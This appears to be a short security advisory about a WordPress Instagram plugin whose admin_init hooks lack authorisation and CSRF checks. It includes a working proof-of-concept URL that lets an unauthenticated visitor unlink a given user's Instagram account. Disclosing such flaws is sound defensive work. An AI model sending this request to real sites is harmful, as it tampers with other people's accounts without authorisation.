Description The plugin does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example
As unauthenticated, open the following URL to unlink the Instagram account of the user with ID 5: https://example.com/wp-admin/admin-post.php?action=enjoyinstagram-remove-user&user;_id=5&tab;=users-settings